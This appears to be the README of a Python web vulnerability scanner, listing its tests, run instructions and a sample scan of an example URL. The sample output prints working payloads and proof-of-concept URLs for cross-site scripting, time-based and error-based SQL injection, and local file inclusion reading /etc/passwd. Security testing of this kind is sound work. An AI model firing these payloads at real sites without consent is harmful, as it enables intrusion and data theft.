VulnScanner
Features
Web Application Firewall (WAF) detection.
Cross Site Scripting (XSS) tests.
SQL injection time based test.
SQL injection error based test.
Local File Inclusion (LFI) test.
Cross Site Tracing (XST) test.
How To Run
git clone https://github.com/NullS0UL/VulnScanner
cd VulnScanner
python3 vulnscan.py http://example.com/page.php?cat=1
Example of Output
python3 vulnscan.py http://example.com/page.php?cat=1
[*] No WAF Detected.
Target: http://example.com/page.php?cat=1
Powered: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
[!] Testing Cross Site Scripting (XSS)
[!] 10 Payloads.
[+] 9 Payloads were found.
[*] Payload found!
[!] Payload: <script>alert("inject")</script>
[!] POC: http://example.com/page.php?cat=<script>alert("inject")</script>
[*] Payload found!
[!] Payload: %3Cscript%3Ealert%28%22inject%22%29%3C%2Fscript%3E
[!] POC: http://example.com/page.php?cat=%3Cscript%3Ealert%28%22inject%22%29%3C%2Fscript%3E
[!] Testing SQLInjection
[*] Blind SQL injection time based found!
[!] Payload: 1-SLEEP(2)
[!] POC: http://example.com/page.php?cat=1-SLEEP(2)
[*] SQL Error found.
[!] Payload: '
[!] POC: http://example.com/page.php?cat='
[!] Testing Local File Inclussion (LFI)
[*] Payload found!
[!] Payload: ../../../../etc/passwd
[!] POC: http://example.com/page.php?cat=../../../../etc/passwd
[!] Testing Cross Site Tracing (XST)
[*] This site seems vulnerable to Cross Site Tracing (XST)!
Discaimer
Usage of the VulnScanner for attack targets without prior mutual consent is illegal.
It is the end user's responsability to obey all applicable local, state, federal and international laws.
Developer assume no liability and not responsible for any misuse or damage caused by this program.
Find me on
Visit my Blog Site
